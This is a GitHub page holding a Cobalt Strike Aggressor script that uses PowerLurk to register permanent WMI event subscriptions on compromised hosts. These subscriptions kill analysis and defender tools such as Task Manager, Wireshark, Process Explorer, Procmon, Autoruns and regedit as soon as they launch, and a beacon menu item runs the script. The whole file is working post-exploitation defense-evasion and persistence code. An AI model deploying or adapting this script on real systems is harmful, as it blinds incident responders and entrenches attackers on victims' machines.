Permalink
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
51 lines (44 sloc) 3.94 KB
# Sysinternals Task Killer
#author: bluescreenofjeff
# Automatically kill common Blue Team processes, such as the Sysinternals tools, on launch.
#Based on command demonstrated by Andrew Luke in his post:
#Creeping on Users with WMI Events: Introducing PowerLurk - https://pentestarmoury.com/2016/07/13/151/
#Save powerlurk.ps1 to the same directory you load this script from
sub sysinternalkiller {
#temp fix
# if (-exists script_resource("powerlurk.ps1")) {
$path = script_resource("powerlurk.ps1");
# return $path;
# }
# else {
# prompt_file_open("Select the PowerLurk.ps1 file on your system", $null, false, {
# $path = $1;
# return $path;
# });
# }
bpowershell_import($1, $path);
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc1 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName taskmgr.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc2 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName wireshark.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc3 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName tcpview.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc4 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName procdump.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc5 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName procexp.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc6 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName procmon.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc7 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName netstat.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc8 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName psloggedon.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc9 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName logonsessions.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc10 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName processhacker.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc11 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName autoruns.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc12 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName autorunsc.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc13 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName regedit.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc14 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName regshot.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc15 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName procexp64.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc16 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName tcpview.exe');
}
popup beacon_bottom {
item "Sysinternal Killer" {
local('$bid');
foreach $bid ($1) {
sysinternalkiller($bid);
}
}
}